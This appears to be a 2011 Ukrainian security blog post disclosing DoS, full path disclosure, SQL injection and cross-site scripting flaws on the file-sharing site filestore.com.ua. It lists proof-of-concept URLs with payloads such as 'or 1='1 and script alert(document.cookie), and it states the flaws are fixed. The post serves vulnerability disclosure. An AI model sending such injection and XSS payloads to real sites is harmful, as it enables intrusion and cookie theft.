« З Різдвом Христовим!
Численні уразливості в багатьох браузерах »

Нові уразливості на filestore.com.ua

19:19 07.01.2011

20.05.2010

У жовтні, 21.10.2009, а також додатково сьогодні, я знайшов Denial of Service, Full path disclosure, SQL Injection та Cross-Site Scripting уразливості на проекті http://filestore.com.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на filestore.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

07.01.2011

DoS:

http://filestore.com.ua/search.php?search=%25%25%25&sort=downloadsdesc&type=filename

Full path disclosure:

http://filestore.com.ua/search.php?search=1&type=’

http://filestore.com.ua/search.php?search=1&sort=’

SQL Injection:

http://filestore.com.ua/search.php?search=1&sort=downloadsdesc&type='%20or%201='1
http://filestore.com.ua/search.php?search=1&sort='%20or%201='1&type=filename

XSS:

http://filestore.com.ua/search.php?search=1&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&type=filename
http://filestore.com.ua/search.php?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=downloadsdesc&type=filename
http://filestore.com.ua/login.php?act=getpass&user=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://filestore.com.ua/login.php?act=getpass&email=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені.


This entry was posted on 19:19 07.01.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.